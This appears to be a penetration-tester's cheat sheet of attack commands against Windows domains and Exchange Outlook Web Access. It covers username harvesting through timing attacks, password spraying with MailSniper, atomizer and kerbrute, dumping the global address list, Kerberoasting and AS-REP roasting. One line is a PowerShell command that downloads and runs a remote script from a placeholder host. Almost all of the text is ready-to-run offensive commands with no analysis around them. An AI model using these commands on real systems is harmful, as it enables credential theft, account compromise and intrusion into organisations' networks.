ipmo C: \Tools\MailSniper\MailSniper.ps1
Invoke-DomainHarvestOWA -ExchHostname 10.10.10.10 # Get Domain
Invoke-UsernameHarvestOWA -ExchHostname 10.10.10.10 -Domain <DOMAIN> -UserList .\usernames.txt -OutFile valid.txt # Get Valid Username using Time Attack
Invoke-PasswordSprayOWA -ExchHostname 10.10.10.10 -UserList .\valid.txt -Password Summer2021 # Spray One Password `Summer2021`
Get-GlobalAddressList -ExchHostname 10.10.10.10 -UserName <Domain>\<Valid_User> -Password <Valid_Password> -OutFile gal.txt # Dump All Username using Valid Creds.
atomizer.py owa owa.domain.local <password to spray> -emails.txt
kerbrute passwordspray -d <DOMAIN> --dc <IP Of DC> valid_users.txt <password to spray>
Note: Sync Timezone and time with the target network. Windows => `tzdate /g
` and Linux => rdate -n <targetip>
GetUserSPNs.py <domain>/<username>:<password> -outputfile <outfile>
powershell.exe -Command 'IEX (New-Object Net.Webclient).DownloadString("http://<ip>:<port>/Invoke-ASREP.ps1");Invoke-ASREPRoast -Domain <DOMAIN Name> -Server <DOMAIN IP> | select -expand hash
GetNPUsers.py <domain>/ -usersfile users.txt -outputfile <outfile> -dc-ip <DC IP> # Without credentials, using a valid users list
GetNPUsers.py <domain>/<username>:<password> -request -outputfile <outfile> # Using Valid credentials